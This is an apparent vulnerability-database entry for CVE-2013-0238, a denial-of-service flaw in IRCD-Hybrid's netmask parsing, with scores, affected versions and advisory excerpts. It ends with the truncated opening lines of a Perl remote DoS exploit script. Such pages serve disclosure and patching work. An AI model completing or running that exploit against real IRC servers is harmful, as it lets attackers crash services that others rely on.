
CVE-2013-0238

Published: 13/02/2013 Updated: 29/08/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

The try_parse_v4_netmask function in hostmask.c in IRCD-Hybrid prior to 8.0.6 does not properly validate masks, which allows remote malicious users to cause a denial of service (crash) via a mask that causes a negative number to be parsed.

Vulnerable Product

ircd-hybrid ircd-hybrid 8.0.2

ircd-hybrid ircd-hybrid 8.0.1

ircd-hybrid ircd-hybrid 7.3.0

ircd-hybrid ircd-hybrid

ircd-hybrid ircd-hybrid 8.0.0

ircd-hybrid ircd-hybrid 7.2.0

ircd-hybrid ircd-hybrid 7.2.3

ircd-hybrid ircd-hybrid 7.2.2

ircd-hybrid ircd-hybrid 7.2.1

ircd-hybrid ircd-hybrid 8.0.4

ircd-hybrid ircd-hybrid 8.0.3

ircd-hybrid ircd-hybrid 7.3.1

Vendor Advisories

Debian Bug report logs - #699267 ircd-hybrid: CVE-2013-0238 Denial of service vulnerability in hostmask.c:try_parse_v4_netmask(). Package: ircd-hybrid; Maintainer for ircd-hybrid is Dominic Hargreaves <dom@earthli>; Source for ircd-hybrid is src:ircd-hybrid. Reported by: Henri Salo <henri@nervfi> ...
Bob Nomnomnom reported a Denial of Service vulnerability in IRCD-Hybrid, an Internet Relay Chat server. A remote attacker may use an error in the masks validation and crash the server. For the stable distribution (squeeze), this problem has been fixed in version 1:722dfsg2-62+squeeze1. For the testing distribution (wheezy), this problem has be ...

Exploits

    #!/usr/bin/perl
    # ircd-hybrid remote denial of service exploit for CVE-2013-0238
    # quick and dirty h4x by kingcope
    # tested against ircd-hybrid-805 centos6
    # please modify below in case of buggy code
    # enjoy!
    use Socket;
    srand(time());
    $exploiting_nick = "hybExpl" int(rand(10000));
    sub connecttoserver() {
    $bool = "yes";
    $iaddr = inet_ ...
ircd-hybrid version 805 on CentOS 6 denial of service exploit ...